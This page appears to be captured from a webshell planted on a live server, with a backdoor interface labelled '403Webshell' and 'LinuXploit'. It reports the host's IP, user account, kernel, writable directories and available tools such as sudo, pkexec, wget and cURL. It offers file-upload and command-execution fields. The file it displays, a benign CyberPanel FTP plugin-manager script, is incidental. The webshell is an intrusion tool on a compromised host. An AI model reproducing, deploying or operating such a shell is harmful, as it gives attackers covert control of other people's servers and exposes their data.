403Webshell
Server IP : 195.114.193.97  /  Your IP : 216.73.216.144
Web Server : LiteSpeed
System : Linux host 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
User : sembi4241 ( 1126)
PHP Version : 8.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/CyberCP/ftp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/CyberCP/ftp/pluginManager.py
from .signals import *
from plogical.pluginManagerGlobal import pluginManagerGlobal

class pluginManager:

    @staticmethod
    def preCreateFTPAccount(request):
        return pluginManagerGlobal.globalPlug(request, preCreateFTPAccount)

    @staticmethod
    def postCreateFTPAccount(request, response):
        return pluginManagerGlobal.globalPlug(request, postCreateFTPAccount, response)

    @staticmethod
    def preSubmitFTPCreation(request):
        return pluginManagerGlobal.globalPlug(request, preSubmitFTPCreation)

    @staticmethod
    def postSubmitFTPCreation(request, response):
        return pluginManagerGlobal.globalPlug(request, postSubmitFTPCreation, response)

    @staticmethod
    def preSubmitFTPDelete(request):
        return pluginManagerGlobal.globalPlug(request, preSubmitFTPDelete)

    @staticmethod
    def postSubmitFTPDelete(request, response):
        return pluginManagerGlobal.globalPlug(request, postSubmitFTPDelete, response)

    @staticmethod
    def preChangePassword(request):
        return pluginManagerGlobal.globalPlug(request, preChangePassword)

    @staticmethod
    def postChangePassword(request, response):
        return pluginManagerGlobal.globalPlug(request, postChangePassword, response)

Youez - 2016 - github.com/yon3zu
LinuXploit